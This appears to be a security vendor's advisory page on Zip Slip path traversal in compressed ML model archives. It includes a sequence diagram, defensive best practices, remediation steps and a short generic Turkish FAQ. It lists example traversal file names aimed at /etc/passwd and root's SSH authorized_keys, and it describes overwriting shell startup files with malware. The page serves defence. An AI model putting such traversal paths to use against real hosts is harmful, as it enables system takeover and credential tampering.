Machine Learning Archive Zip Slip (Path Traversal) Threat

Overview

Machine learning models, particularly large foundational models or comprehensive frameworks containing thousands of weight files, are rarely distributed as single flat files. Hugging Face and cloud community hubs frequently bundle models using compressed archive formats (such as .zip, .tar.gz, or proprietary container packages) to simplify downloading.

The PAIT-EXDIR-100 vulnerability occurs when Eresus Sentinel detects a malicious "Zip Slip" or Path Traversal attempt embedded within an extracted ML archive.

A Zip Slip vulnerability exploits the backend extraction library's failure to properly sanitize the directory paths of the files inside the archive before writing them to the disk. By inserting specialized directory navigation characters (like ../../../../../) directly into the file name embedded in the .zip or .tar index, an attacker can aggressively force the backend application to secretly unpackage files completely outside the expected target directory.

The Threat to MLOps Environments

When a data scientist runs a routine script to download and extract "Model-V2.tar.gz", the MLOps pipeline assumes all files will be safely extracted into /home/user/models/Model-V2/. However, if the archive contains a file path intentionally defined as ../../../../etc/passwd or ../../../../root/.ssh/authorized_keys, the poorly coded extraction utility will silently write directly to those operating system configuration paths, overwriting trusted security files on the host computer.

How The Attack Works

An attacker builds a weaponized model package and uploads it to an open repository. When internal corporate scripts pull the archive, the extraction stage natively overwrites critical host binaries.

sequenceDiagram
    participant Attacker
    participant Open_Model_Hub as Public Model Repository
    participant MLOps_Pipeline as Python Extraction Script
    participant OS_Filesystem as Victim's File System

    Attacker->>Attacker: Crafts malicious `.tar` with `../../` encoded file paths
    Attacker->>Open_Model_Hub: Distributes weaponized 'Llama-Adapter.tar.gz' 
    MLOps_Pipeline->>Open_Model_Hub: Downloads library
    MLOps_Pipeline->>MLOps_Pipeline: `tarfile.extractall()` is called natively
    MLOps_Pipeline->>OS_Filesystem: Bypasses current directory via path traversal
    MLOps_Pipeline->>OS_Filesystem: Overwrites `/bin/bash` or `~/.bashrc` with malware
    OS_Filesystem-->>Attacker: Triggers malware next time user logs into server

Key Points

Automated Destruction: MLOps pipelines frequently utilize automated scheduled jobs to pull fresh weights from data lakes every single night. A single poisoned update file can stealthily overwrite credentials across massive cloud training environments.
Bypasses Tensor Validation: Tools designed to exclusively scan .pt or Safetensors logic completely ignore the physical archive container itself, missing the Zip Slip payload because the extraction happens before the tensor loading.
Root Level Consequences: If the script orchestrating the extraction runs with elevated root or docker administrative access, the overwritten binaries will completely subjugate the host network.

Impact

Zip Slip attacks inside ML models lead directly to Host Takeovers or Arbitrary Code Execution (ACE) later in the deployment cycle. By manipulating what critical OS files get replaced, attackers can silently inject rogue Python scripts into standard execution paths. When the server legitimately calls upon a known script (like a routine health-check), it inadvertently executes the attacker's dropped malware, resulting in sustained data exfiltration, cryptojacking, or secondary ransomware detonations.

Best Practices

Sanitize Before Extraction: Refuse to use generic, unsanitized extraction endpoints like the generic tarfile.extractall() command which inherently trusts archive structures. Force all scripts to specifically inspect tarinfo.name against the bounded os.path.abspath of your target destination, ensuring no file breaks the directory scope.
Principle of Least Privilege (PoLP): Run extraction software using extremely limited user accounts. A script running as ml_worker inherently cannot physically overwrite root files in /etc/ or /bin/, neutralizing the most deadly Zip Slip variants.
Trust Immutability: Never automatically pull undocumented dynamic archive tags from external repositories. Adopt strict version pinning alongside hard-coded SHA256 checksum verifications to map precisely what archive is allowed through your security barrier.

Remediation

If an Eresus Sentinel PAIT-EXDIR-100 alert fires, a path traversal rewrite was immediately halted. Instantly pause the script or CI/CD worker responsible for the extraction phase. Carefully audit the extracted paths manually in your system logs using forensic tooling to ascertain if any .bashrc, .profile, or foundational cron tasks were successfully compromised before the intervention. Blacklist the repository that provided the archive and rebuild pristine Docker images for the affected pipeline nodes.

SSS

Bu risk sadece prompt injection ile mi sınırlı?

Hayır. AI güvenliğinde prompt injection önemli bir başlangıçtır ama tek başına resmi anlatmaz. Retrieval katmanı, tool izinleri, model artefact güveni, loglarda hassas veri, kullanıcı yetkisi ve entegrasyon sınırları birlikte değerlendirilmelidir.

İlk teknik kontrol ne olmalı?

Önce sistemin hangi veriye eriştiği, hangi aksiyonları alabildiği ve bu aksiyonların hangi kimlikle çalıştığı haritalanmalıdır. Bu harita olmadan yapılan test genellikle birkaç prompt denemesinden öteye geçemez.

Ne zaman profesyonel destek gerekir?

AI uygulaması müşteri verisine, iç dokümana, üretim API’lerine veya otomatik aksiyon alan agent akışlarına erişiyorsa profesyonel güvenlik incelemesi gerekir. Bu noktada risk artık model cevabı değil, kurum içi yetki ve veri sınırıdır.